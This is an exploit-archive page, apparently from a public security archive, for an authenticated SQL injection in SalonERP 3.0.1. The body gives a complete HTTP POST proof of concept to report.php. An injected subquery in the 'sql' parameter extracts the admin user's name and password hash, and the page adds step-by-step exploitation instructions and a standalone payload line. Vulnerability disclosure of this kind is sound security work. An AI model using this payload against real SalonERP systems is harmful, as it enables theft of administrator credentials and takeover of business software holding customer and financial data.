SalonERP 3.0.1 SQL Injection

SalonERP 3.0.1 SQL Injection: Posted Jan 13, 2022; Authored by Betul Denizler; SalonERP version 3.0.1 suffers from a remote SQL injection vulnerability.; tags | exploit, remote, sql injection; SHA-256 | 7b3c8173a6dadc3b11b7d4583b0a200be4d6c11f50ab3a406a7f4e81ee040eea; Download | Favorite | View

SalonERP 3.0.1 SQL Injection

# Exploit Title: SalonERP 3.0.1 - 'sql' SQL Injection (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://salonerp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/salonerp/files/latest/download
# Version: SalonERP v3.0.1
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: sql
# Date: 11/01/2022
'''
DESCRIPTION
========
The vulnerability allows an attacker to inject payload using 'sql' parameter in sql query while generating report. Upon successful discovering the login admin password hash, it can be decrypted and obtained the plain-text password.


POC REQUEST:
========
POST /salonerp/report.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 755
Origin: http://127.0.0.1
Connection: close
Cookie: salonerp-id=vDF9uCpfqQAXuNhsCWvH; PHPSESSID=e170a8c9dfeef78751cb49b9977b2373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

save=&title=bestCustomers&font=Times&fontSize=12&sql=SELECT%0A%09%09%09%09%09%09(select+concat(u.name%2C'+'%2Cu.password)+from+Models%5CUser+u+where+u.id+%3D+1)+AS+userpass%2C%0A%09%09%09%09%09%09COUNT(i.id)+AS+amount%2C%0A%09%09%09%09%09%09SUM(i.cash+%2B+i.bank)+as+revenue%0A%09%09%09%09%09FROM+Models%5CInvoice+i%0A%09%09%09%09%09JOIN+i.event+e%0A%09%09%09%09%09JOIN+e.customer+c%0A%09%09%09%09%09WHERE+DATE_DIFF(i.date%2C+%3AstartDate)+%3E%3D+0%0A%09%09%09%09%09AND+DATE_DIFF(i.date%2C+%3AendDate)+%3C%3D+0%0A%09%09%09%09%09GROUP+BY+e.customer%0A%09%09%09%09%09ORDER+BY+revenue+DESC&ask%5B0%5D%5Bname%5D=startDate&ask%5B0%5D%5Bvalue%5D=2021-12-14T00%3A00%3A00&ask%5B1%5D%5Bname%5D=endDate&ask%5B1%5D%5Bvalue%5D=2021-12-15T00%3A00%3A00&currency%5B%5D=2

EXPLOITATION
========
1. Create a database and login panel
2. Create employees in the settings
3. Create Products, Customers and Events
4. Pay for Products on Event
5. Create report on the "Reports" menu
6. Inject payload to the "sql" parameter in POST request for generate report

Payload: (select+concat(u.name,'+',u.password)+from+Models\User+u+where+u.id+=+1)+AS+userpass
'''

Top Authors In Last 30 Days

Red Hat 225 files
indoushka 116 files
Ubuntu 84 files
Gentoo 36 files
Jasper Nota 25 files
Debian 19 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Apple 9 files
Martijn Baalman 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,101)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,815)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,569)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,756)
UNIX (9,438)
UnixWare (187)
Windows (6,674)
Other

SalonERP 3.0.1 SQL Injection

SalonERP 3.0.1 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

SalonERP 3.0.1 SQL Injection

Share This

SalonERP 3.0.1 SQL Injection

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems